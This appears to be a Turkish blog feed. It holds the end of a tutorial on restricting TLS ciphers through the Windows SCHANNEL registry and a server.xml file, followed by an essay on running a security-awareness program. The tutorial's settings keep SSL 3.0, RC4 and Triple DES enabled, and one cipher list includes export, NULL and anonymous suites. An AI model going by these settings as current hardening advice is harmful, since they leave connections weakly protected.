[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Client]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Client]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Client]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server]

 

 

Burada kapatmak istediğimiz cipherların bir alt satırına "Enabled"=dword:00000000, açmak istediklerimize ise "Enabled"=dword:00000001 yazılır. Aşağıda, düşük güvenliği olan cipherları, 128 bit’den daha düşük olan cipherları kapattığımız reg dosyasının içeriği bulunmaktadır.

 

 

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL]

"EventLogging"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\NULL]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 128/128]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 56/128]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 128/128]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 64/128]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\Triple DES 168/168]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes\MD5]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Hashes\SHA]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\Diffie-Hellman]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\PKCS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Client]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Client]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server]

"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Client]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Client]

"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server]

"Enabled"=dword:00000001

 

Kaydettikten sonra bu reg dosyasına çift tıklanarak ayarların registera yüklenmesi sağlanabilir. Değişikliklerin geçerli olabilmesi için bilgisayarın yeniden başlatılması gerekmektedir.

 

TLS1.0, SSL3.0 ve SSL2.0 enabled ve bütün cipherlar Enabled iken sunucuya önerilen cipher listesi Şekil- 12’te görülebilir.

 

 

image012

Şekil- 12

 

Web server ssl2 hizmeti vermediginden dolayı bize TLS1.0 destegi saglayan cipherı destekledigini belirten mesajı Şekil – 13’de yolluyor.

 

 

image013

Şekil – 13

 

Ve seçilen TLS_RSA_WITH_RC4_128_MD5 cipher ile güvenli iletişim başlıyor.

 

RemoveWeakCiphers.reg dosyası (yukarda oluşturduğumuz) çalıştırılarak Low cipher’ların (128 bitten düşük) kapatılması sağlanır.

 

Client’in yolladığı cipherlar listesiŞekil-14’te görülebilir.

 

 

image014

Şekil-14

 

 

Trafiğin iletilmesinde seçilen cipher Şekil-15‘tedir.

 

 

 

image015

Şekil – 15

 

Server Tarafındaki Cipherların Ayarlanması:

 

Client üzerinde nasıl daha güvenli cipher ayarlandığını inceledik. Aynı şekilde sunucu üzerinde de nasıl ayarlandığını inceleyelim.

 

Örnek olarak, Apache Web Server üzerinde yapılması gereken konfigürasyonlardan bahsediyor olacağız.

 

Apache Web Server üzerinden Low Cipherları disable ederek, Client gönderdiği cipher listesinde Low cipherlar olsa bile, bunlarla bağlanamaması sağlanabilir. Fakat cipher listesini güncellerken aklımızda bulunması gereken bir konu da Server ile Client arasında iletişimsizliğe sebep olabileceğimizdir. Client tarafında bulunan cipher listesinde Server tarafında belirtilmeyen cipherlar mevcut ise iletişim sağlanamaz.

 

<install_dir>\conf dizininin altında server.xml dosyası içerisinde yapılması gereken konfigürasyonlar:

 

 

image016

Şekil – 16

 

İçerik olarak server tarafında hangi cipher desteklenmesi isteniyorsa server.xml’in içerisindeki ciphers kısmına ekleme veya çıkartma işlemi gerçekleştirilebilir. Server.xml dosyasındaki cipher adlarının yazım sırası, tercih sıralamasını etkilemez. Server.xml dosyasına hangi sıra ile yazılmış olurlarsa olsunlar, Şekil – 8’de verilen sıralamaya göre tercih edilirler.

 

 

Server.xml üzerinde aşağıdaki satırlar bulunarak gerekli düzenlemeler yapılır:

 

 

 

image017

Şekil – 17

 

sslProtocol="TLS" değeri sadece TLS üzerinden iletişime geçmesi için verilen değerdir. Buraya SSLv2 yazılırsa sadece SSLv2 üzerinden iletişime geçecektir. Buradaki değişiklik sadece Apache Web Server tarafında yapılmıştır. Bu durumda Client tarafından yollanan cipher listesinde sadece TLS desteği verilen cipherlar arası seçim yapılacaktır.

 

 

sslProtocol="TLS" ciphers="SSL_RSA_EXPORT_WITH_RC4_40_MD5, SSL_RSA_EXPORT_WITH_DES40_CBC_SHA, SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA, SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA, TLS_RSA_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_RC4_128_SHA, TLS_DHE_RSA_WITH_AES_256_CBC_SHA, TLS_DHE_DSS_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_NULL_MD5, SSL_RSA_WITH_NULL_SHA, SSL_DH_anon_WITH_RC4_128_MD5, TLS_DH_anon_WITH_AES_128_CBC_SHA, SSL_DH_anon_WITH_3DES_EDE_CBC_SHA, SSL_DH_anon_WITH_DES_CBC_SHA, SSL_DH_anon_EXPORT_WITH_RC4_40_MD5, SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA"

 

İstemci(client) sunucuya(server) https bağlantı isteği gönderdiğinde yollanan cipher listesi;

 

 

image018

Şekil – 18

 

 

Server tarafından kabul edilen cipher ise,

 

 

image019

 

Şekil – 19

 

Bir başka yöntem olarak server.xml dosyasını tercih edeceğimiz şekilde düzenleyebiliriz; kullanılmasını istediğimiz veya daha güvenli bir cipher var ise ya tek başına o cipher’ı server.xml’e koymamız gerekir ya da yukarda verilen tercih listesinde (Şekil - 8) tercih ettiğimiz cipher’ın önceliği daha düşük olan cipherları listeye ekleyerek ilerleyebiliriz.

 

Biz burada SSL_RSA_WITH_3DES_EDE_CBC_SHA cipher kullanmasını istiyoruz. Bunun için yeni listemiz aşağıdaki gibidir.

 

 

image020

Şekil – 20

 

 

 

Client tarafından yollanan cipher listesi,

 

 

 

image021

Şekil – 21

 

Server tarafından bağlantı sırasında kullanılan önceliği en yüksek olan cipher Şekil – 22’de görülebilir.

 

 

image022

Şekil – 22

 

 

 

Makalemizde Client ve Server arasındaki https bağlantısının nasıl daha güvenli hale getirilebileceğini hem server hem de client tarafından ele aldık. Buradaki ayarları yaparken, Server’da low cipherların kaldırıldığında, client’ın da low cipherlarla bağlanamayacağı unutulmamalıdır.

 

Kaynakça:

http://www.openssl.org/docs/apps/ciphers.html

http://docs.oracle.com/javase/1.4.2/docs/guide/security/jsse/JSSERefGuide.html#SunJSSE

http://support.microsoft.com/kb/245030

http://www.wireshark.org/

http://www.openssl.org/

 http://www.myonapp.org/network-makale-dokuman/uclu-tokalasma-3-way-handshake-floodgate-834.html#ixzz2FUiqRcNe

http://www.thesprawl.org/research/tls-and-ssl-cipher-suites/

 


Bilgi Güvenliği Bilincinin Genele Yayılması

$
0
0

 

İnsan faktörü bilgi güvenliği programlarındaki en zayıf halka olarak nitelendirilmektedir. Kullanıcılar kasıtlı veya kasıtsız olarak, bilgi ağı ve kurumları tehditlere açık halde bırakmaktadır.  Güvenlik  programları  çoğunlukla  insan  faktörü  yerine,  teknik  kontrollere odaklanma eğilimindedir.

 

İnsana bağlı güvenlik riski hiçbir zaman tamamen yok edilemese de iyi planlanmış bir kullanıcı bilinçlendirme çalışması, riskin kabul edilebilir bir seviyeye indirilmesine yardımcı olacaktır. Kullanıcıların bilgiyi ve bilgi kaynaklarını koruma konusunda üzerlerine düşen sorumlulukları anlaması kritik öneme sahiptir. Burada bilgi güvenliği bilincinin önemi ve bir bilgi güvenliği programının temel hedeflerini nasıl desteklediği anlatılmaktadır. Bunun yanı sıra etkili bir bilinçlendirme stratejisinin nasıl uygulanabileceği konusunda öneriler sunulmaktadır. Uygulamalarda karşılaşılmış engel ve zorluklar da aşağıda belirtilmektedir.

 

Bilgi güvenliği bilinçlendirme çalışmasının hedefleri

 

Bilinçlendirme programının temel hedefi, kullanıcıları kurumsal bilgi ve bilgi kaynaklarının gizlilik, bütünlük ve devamlılığı konusundaki görev ve sorumlulukları konusunda eğitmektir. Bilgi güvenliği sadece Bilgi Teknolojileri güvenlik ekibinin değil, tüm personelin sorumluluğudur. Kullanıcılar sadece bilginin korunması konusunda nasıl katkı sağlayabileceklerini değil, aynı zamanda bilginin neden korunması gerektiğini de öğrenmelidir. Kullanıcılar ya eğitimsizlikten ya da güvenlik hakkındaki bilinç eksikliğinden, genellikle güvenlik zincirinin en zayıf halkası olarak değerlendirilmektedir. Çalışanlar, hatalı davranışlarının kurum bilgi güvenliği üzerinde yaratabileceği etkiyi anlamalıdır. Kullanıcı bilinçlendirme çalışmaları,  güvenlik  ihlallerinin maliyetini azaltmaya ve kontrollerin kurumun tüm bilgi kaynakları üzerinde dengeli uygulanmasına yardımcı olacaktır.

 

Güvenlik bilinçlendirme çalışmaları genellikle iki farklı, ancak ilişkili parçaya ayrılır; bilinçlendirme ve eğitim. Bilinçlendirmenin amacı, güvenlik ve güvenlik kontrollerinin önemi hakkında kollektif bir bilinç oluşturulmasıdır. Bilinçlendirme mesajları basit ve açık olmalı, sunumu hedef kitlesinin kolayca anlayabileceği bir formatta yapılmalıdır. Eğitimin amacı ise kullanıcı anlayışının derinleştirilmesidir. Eğitim yöntemleri, sınıf dersleri, bire bir eğitim veya eğitim paketleri olabilir.

 

Başarıya ulaşma konusunda karşılaşılabilecek engeller

 

Ne yazık ki, başarılı bir bilinçlendirme çalışması uygulanması zor ve başarılması imkansız görev olarak görülebilir. En iyi planlanmış programlar dahi birtakım engeller ile karşılaşabilir. Bu nedenle bir program uygulamadan önce, karşılaşılabilecek engellerin anlaşılması faydalı olacaktır.

 

Eski köye yeni adet

 

Pek çok organizasyonda güvenlik fonksiyonalite ihtiyacının gölgesinde kalmakta ve uygulanmasında geç kalınmaktadır. Güvenlik uygulamaları başından itibaren uygulanmadığından, kullanıcılar kötü alışkanlıklar edinmek için aylar, hatta yıllara sahiptir. Bu durum bilgi güvenliği bilinçlendirme programının uygulanmasını iki kat zorlaştırır. Çünkü sadece kullanıcıları eğitmek değil, aynı zamanda eski alışkanlıklarından kurtarmak gerekmektedir. Bunun yanında kullanıcılar da bilinçlendirme programını kabul etmek için fazladan sorun yaşar. Kullanıcılara göre kurum, güvenlik önlemleri olmaksızın gayet iyi çalışmıştır. Yeni güvenlik önlemleri hayatı zorlaştırıcı gereksiz değişiklikler olarak görülür.

 

Güvenlik, bilgi teknolojilerinin problemi, benim değil

 

Çoğu kullanıcı, bilgi güvenliğinin Bilgi Teknolojileri Güvenlik Bölümü'nün sorumluluğu olduğu, kendilerini ilgilendirmediği fikrine sahiptir. Rollerini işlerinin gerektirdiği minimum uyumu göstermekle sınırlı görüp, kuruma faydalı olabilecekleri büyük resimdeki yerlerini göz ardı etme eğilimindedirler. Politika ve prosedürlere uyum iyi bir başlangıç olmakla birlikte, daha yapılacak çok fazla iş vardır. Kullanıcıların Bilgi Teknolojileri Bölümü'nün bu işi tek başına yapamayacağını anlaması gerekir.

 

Yeni teknoloji

 

Yeni teknolojinin kuruma katılması, genellikle kullanıcı davranışlarının değişmesi veya yeni bir bakış açısına sahip olmasını gerektirir. Bu bir sorun teşkil etmemektedir, ancak, teknoloji bazen bilinçlendirme programından hızlı veya bağımsız olarak ilerlemektedir. Çoğu zaman bilinçlendirme ekibi sürecin dışında veya eğitim gereksinimleri konusunda zamanında bilgilendirilmemiş olmaktadır. Bu nedenle bilinçlendirme programı, bölümler arası iletişim, acil durum  ve  kriz iletişimi konuları üzerinde durmalıdır.

 

Tek ölçü farklı beden

 

Bazı bilinçlendirme programları hedef kitlesini doğru sınıflandıramamakta ve hedef kitleye uygun mesajları iletememektedirler. Bu hatalı strateji, iletilen mesajların kulak ardı edilmesine neden olmaktadır. Kullanıcılar gündelik hayatlarında etraflarından yüzlerce mesaj almaktadır. Kullanıcıların sınıflandırılması ve sadece ihtiyaç duydukları mesajları almaları son derece önemlidir. Her bedene tek ölçü stratejisi, programı uygulayanlar açısından kolay olabilir, ancak etkili olmayacaktır.

 

Aşırı bilgi

 

Bir diğer hata da fazla eğitimdir. İnsanlar herhangi bir kaynaktan gelebilecek bilgiye karşı bir eşik değerine sahiptirler. Bir kişi sürekli olarak mesaj verilmeye zorlanırsa, bir süre sonra eşik değeri aşılacak ve ilgisi kaybolacaktır. Doğru sınıflandırma yapılsa bile, fazla bilgi fazla bilgidir. Bilinçlendirme programı bir akşamda bitirilmek zorunda değildir. Hedef kitleden gelen tepkiler dinlenmeli ve denge kurulmalıdır.

 

Organizasyon bozukluğu

 

Pek çok bilinçlendirme çalışması, tutarlı ve düzenli bir strateji ile mesajlarını hedef kitlesine ulaştıramamaktadır. Tutarlı ve düzenli bir çerçeve olmadan kullanıcıların programı benimsemesi ve hatta ne amaçla yapıldığını algılaması bile zorlaşacaktır. İletişimde tutarlılık ve düzenin sağlanması programa kişilik kazandıracaktır.

 

Takip etmeme

 

Bilinçlendirme programlarının bir başlangıç heyecanı ile başlatılması, ancak çok az başarı sağlaması olağandır. Pek çok program düzenli ve periyodik olarak gerçekleşen bir iletişim çemberini kuramamaktadır. Kullanıcılar ile düzenli iletişimin sürdürülmesi, anahtar mesajları hatırlamaları açısından önemlidir. Bunun yanında pek çok program hedef kitlesinin düşüncelerini öğrenmeyi ihmal eder. Hedef kitlenin dinlenilmesi ve programın onların ihtiyaçlarına uygun biçimde düzenlenmesi çok önemlidir.

 

Yönetim desteğinin bulunmaması

 

Yönetim desteği, bilgi güvenliği kullanıcı bilinçlendirme programının olmazsa olmaz unsurudur. Güvenlik mesajlarının etkili olabilmeleri için en yukarıdan desteklenmeleri gereklidir. Pek çok yönetici bu tür çalışmalar konusunda desteğini dile getirse de, desteğin gerçekleşmesi söylemek kadar kolay olmamaktadır. Bu durum yöneticilerin kendi iş  ve sorumluluklarının bulunmasından kaynaklanmaktadır. Yönetimin temel hedefi iş hedeflerine ulaşmak olup, güvenliğin önemine ne kadar inansalar da zaman ayırmaları güç olmaktadır.

 

Kaynak eksikliği

 

Bu durum genellikle yönetim desteğinin eksikliğinden kaynaklanmaktadır. Yönetim desteği olmaksızın gerekli kaynağı ayırmak çoğu zaman imkânsızdır, kaynak eksikliği de böyle bir durumda nasıl bir sonuç elde edilebilir ise ona ulaşmaya mahkûmdur.

 

"Neden" sorusunun yanıtlanmaması

 

Pek çok bilinçlendirme programı kullanıcıları bilgi güvenliğinin neden önemli olduğu konusunda eğitmeyi başaramamaktadır. Bu programlar diğer tüm konuları kapsamakta, ancak kullanıcı motivasyonunu artıracak en önemli konuyu atlamaktadır. Bazı davranışların neden güvenliği zayıflattığını anlayan kullanıcılar, bilgi güvenliğine sahip çıkıp, davranışlarını değiştireceklerdir. Örneğin, daha sıkı kurallara sahip bir şifre politikasını kullanıcılara iletirseniz, onlar bu politikayı bir yük olarak göreceklerdir. Diğer taraftan kullanıcılara şifrelerin nasıl kırıldığını ve kötü niyetli kullanılabildiğini, bu durumun potansiyel sonuçlarını anlatırsanız, kullanıcılar politikaya sahip çıkarak, yeni politikayı uygulamaya gönüllü olacaklardır.

 

Sosyal mühendislik

 

Sosyal mühendislik bilinçlendirme programının uygulanmasını etkilemez, ancak başarısını etkileyebilir. Bu konuya önem verilmesi, güçlendirmeye çalıştığımız insan faktörünü hedef alması açısından önemlidir. Sosyal mühendislik, insan doğasında var olan başkalarına güvenme  ve yardım etme eğiliminin başka şekilde elde edilmesi zor olan şeylerin ele geçirilmesi amacı ile kullanılmasıdır. İnsanlar başkalarının maksatlı olarak kendilerini tuzağa düşürmeyecekleri veya kullanmayacaklarını düşünme eğiliminde olsalar da bu yöntem en sık kullanılan saldırı yöntemlerindendir. Bu yöntem öyle kolay ve hızlıdır ki, saldırganlar sık sık bu yönteme başvururlar. Öyle ya, bir saldırgan yardım masasından arıyormuş gibi davranarak kolayca şifrenizi almak varken, neden saatlerce şifrenizi kırmaya çalışsın. En yaygın sosyal mühendislik yöntemleri; başka birisiymiş gibi davranma, kompliman, aciliyet ve otorizasyon alınmış duygusu yaratmadır. Bu nedenlerle kullanıcıların sosyal mühendisliğe karşı korunmasını hedefleyen bir eğitim stratejisi izlenmelidir.

 

Etkili bir bilgi güvenliği bilinçlendirme programının geliştirilmesi

 

Etkili bir bilgi güvenliği bilinçlendirme programının geliştirilebilmesi için aşağıdaki adımlar izlenebilir:

 

Bilgi güvenliği politikasının geliştirilmesi

 

Güçlü ve anlamlı bir bilgi güvenliği politikası, her başarılı bilinçlendirme çalışmasının temelini oluşturur. Bilinçlendirme çalışmasına başlamadan önce, tüm üst seviye hedeflerin ve güvenlik programının gereklerinin dokümante edilmiş olması kritik önem taşımaktadır. Politika açık ve kısa ifadeler ile yazılmış olmalı ve kurumun bilgi güvenliği konusundaki önceliklerini yansıtmalıdır. Politika ortaya konduktan sonra, kullanıcılar politikanın varlık ve içeriğinden haberdar olmalıdır. Kullanıcılar aynı zamanda politikaya uymamanın doğuracağı sonuçlar hakkında da bilgi sahibi olmalıdır.

 

Mevcut eğitim ihtiyaçlarının belirlenmesi

 

Başarılı bir bilinçlendirme programının geliştirilmesindeki ikinci adım, kurum personelinin mevcut eğitim ihtiyaçlarının belirlenmesidir. Bu adım genellikle göz ardı edilmekte veya geçiştirilmektedir. Pek çok durumda programlar kullanıcı ihtiyaçlarının dinlenmesi yerine, varsayımlara dayanılarak geliştirilmektedir. Kullanıcıların güvenlik konusundaki mevcut bilgi düzeyinin ölçülmesine zaman ayrılması eğitim ihtiyaç ve önceliklerinin doğru tespitine yardımcı olacaktır. Aşağıdaki maddeler bu adımda ortaya çıkarılabilecek konuları içermektedir:

 

x     Kullanıcıların öğrenme stil ve tercihleri

x     Özel ilgi veya endişe alanları

x     Bilinçlendirme programına karşı duyulan direnç ya da sempati

x     Daha önceki başarılı veya başarısız eğitim girişimleri

x     Daha önceden mevcut bulunan eğitim kaynak ve materyalleri

x     Programın başarısı için destek alınabilecek kişi veya grupların tespiti

 

Ön araştırmanın yapılması ile mevcut kaynakları en iyi biçimde kullanıp, başarı şansını yükselten bir bilinçlendirme programı tasarlanması mümkün olabilir. Aşağıda mevcut eğitim ihtiyaçlarının tespitinde kullanılabilecek bazı yöntemler bulunmaktadır:

 

x     Farklı kıdem, unvan ve iş tanımlarına sahip kullanıcılar ile görüşme

x     Genel kullanıcılara temel güvenlik bilgileri hakkında anket veya kısa soru listesi gönderme

x      Kurumda  son  zamanlarda  karşılaşılmış  güvenlik  problemlerinin  tespiti  (örneğin  geçen   yıl çalınan diz üstü bilgisayarların sayısı)

x     Sistem, uygulama ve bilgi ağı denetimlerinin gerçekleştirilmesi

x     Farklı birimlerle yüz yüze toplantılar gerçekleştirilmesi

x      Bina ve kullanım alanlarının ziyaret edilmesi ve mevcut fiziksel güvenlik seviyesinin gözlenmesi. Kilitlenmemiş ofis odaları, dolaplar ve güvenliği bulunmayan kişisel bilgisayar ve bilgilerin izlenmesi.

 

Üst yönetimin desteğinin sağlanması

 

Güvenlik ihtiyacının tespitinden sonraki aşama, üst yönetimin ve kurum içinde otorite sahibi pozisyonlardaki kişilerin desteğini almaktır. Ne yazık ki, bir bilinçlendirme programı ihtiyacının kabul ettirilmesi zor bir iştir. Bilgi güvenliği bilinci sadece iş hedeflerine ulaşmada karşılaşılan bir engel olarak görülmez, aynı zamanda bilgi güvenliğinin göz ardı edilen bir parçası olarak kalır. Güvenlik bilinci genellikle firewall ve anti-virüs araçlarının uygulanmasının arkasında bir öneme sahip olarak kalır.

 

Üst yönetimin desteğinin sağlanmasında iki temel hedef akılda tutulmalıdır. Birinci hedef kaynak teminidir. Bu tür bir programı uygulamak, bazı kaynakların bu iş için kullanılmasını gerektirecektir. Kurumun büyüklüğüne göre gerekli bütçe sağlanmalıdır. İkinci, ancak daha az öneme sahip olmayan hedef güvenlik hamilerinin kurum içinde oluşmasını sağlamaktır. Sadece maddi kaynak yaratan değil, aynı zamanda davranışları ile diğer kişilerin de bilinçlendirme programına değer vermeleri ve programa katılmalarını sağlayan kişilerin bulunması, başarı için çok önemlidir. Yöneticileri eğitimin önemini ortaya koyup desteklerse, çalışanlar eğitime katılma ve yarar sağlama konusunda daha istekli olur.

 

Üst yönetimin desteğinin sağlanması için yönetimin bilinçlendirme çalışmasının kurumsal bilgi ve bilgi kaynaklarının korunmasındaki hayati rolünü anlamasına yardımcı olunması gerekmektedir. Ancak bu aşamaya gelindiğinde kurumun güvenlik ihtiyaç analizi yapılmış olacağından, endüstri istatistik ve örnekleri ile de desteklenen materyaller gerekli desteğin sağlanmasında yardımcı olacaktır.

 

Hedef kitlelerin belirlenmesi

 

Bir sonraki önemli adım hedef kitlelerin belirlenmesidir. Herkes işlerini yapabilmek için aynı derece veya tipte güvenlik bilincine ihtiyaç duymaz. Kullanıcı grupları arasında gerekli ayrımı yapan ve her gruba sadece ilgili bilgiyi sunan bir bilinçlendirme programı, en iyi sonucu elde edecektir. Günümüzde her birimiz bilgi bombardımanına tutulmaktayız. İletmek istediğiniz mesajların kulak ardı edilmesini istemiyorsanız, sadece gerekli bilgiyi gerekli kitleye iletmelisiniz. Tek bir programın herkes için uygun olacağı düşüncesi, programın işe yaramamasına neden olabilir.

 

Hedef kitleler çeşitli biçimlerde ayrıştırılabilir. En çok kullanılan bazı yöntemler aşağıdaki gibidir:

 

x  Bilinç seviyesi

x  Teknik bilgi seviyesi

x  Unvan/Yetki seviyesi

x  İş fonksiyonu

x  Kullanılan teknoloji, sistem ya da uygulama

 

Kurum için istenen sonucu ürettiği sürece, hangi kriterlerin kullanıldığı önemli değildir. Büyük kurumlarda yukarıda sayılan yöntemler kombinasyon halinde 4 ana kategoriyi belirlemek için kullanılabilir. Bu kategoriler gerekiyorsa daha alt gruplara bölünebilir. 4 ana kategori aşağıda belirtildiği gibidir:

 

x     Üst Yönetim - Kurumun stratejik hedeflerini belirleyen en üst seviyedeki yönetim kademeleri

x     Yönetim - Orta seviye ve lider görevi taşıyan yöneticiler

x      Teknik Kullanıcılar - Sistemler üzerinde sıra dışı erişim haklarına ve bilgiye sahip personel. Bu kullanıcılar sistem ve kullanıcı yönetimi, donanım bakımı, uygulama geliştirme ve uyarlaması ve teknik destek hizmetlerini yerine getirmektedir.

x      Son Kullanıcılar - Kurumun bilgi kaynaklarını kullanmaya yetkili tüm kullanıcılar. Bu grup diğer üç grupta bulunan kullanıcıları kapsamaktadır.

 

Kilit mesajların belirlenmesi

 

Her gruba özgü kilit mesajları oluşturmadan önce tek bir çekirdek ifade veya misyon ifadesi belirlenmelidir. Bu çekirdek ifade bilgi güvenliği politikası içinde belirtilmiş olabilir, ancak bu aşamada da düşünülmelidir. Diğer tüm kilit mesajlar bu ifadeyi desteklemeli ve işaret etmelidir. Böyle bir ifadeye örnek olarak:

 

x      Bilgi güvenliği bilinçlendirme programının misyonu kurumun bilgi ve bilgi kaynaklarının gizlilik, bütünlük ve devamlılığının korunmasıdır.

 

Bir sonraki adım her grup için üst seviye, kilit mesajların oluşturulmasıdır. Bunun yapılabilmesi için, kurumun bilgi güvenliği politikasındaki ifadeler hedef kitlelere göre sınıflandırılmalıdır. Bu mesajlar sadece program misyonunu desteklememeli, aynı zamanda daha detaylı mesajlar için zemin oluşturmalıdır. Aşağıdakiler hedef kitlelere göre belirlenmiş üst seviye kilit mesaj örnekleridir:

 

Üst yönetim

 

x     Güvenlik süreçlerinde üst yönetim gözetim ve rehberliğini sağla

x     Güvenlik yatırımlarının iş öncelikleri ile uyumunu sağla

x     Kurum ve birimlere özgü güvenlik politika ve standartlarına uyumu temin et

 

Yönetim

 

x     Güvenlik politika ve standartlarını anlama ve uyuma yönelik süreç ve önlemleri geliştir

x     Mevcut ve yeni gelecek iş süreçlerindeki potansiyel güvenlik risklerini belirle ve önlem al

 

Teknik kullanıcı

 

x     Yönetimin belirlediği politika, standart ve prosedürleri uygula

x      Son kullanıcılar için gerekli prosedür ve teknik önlemleri uygulayarak güvenlik politika ve standartlarına uyumu sağla

 

Son kullanıcı

 

x     Kurumun bilgi ve bilgi kaynaklarının gizlilik, bütünlük ve devamlılığını koru

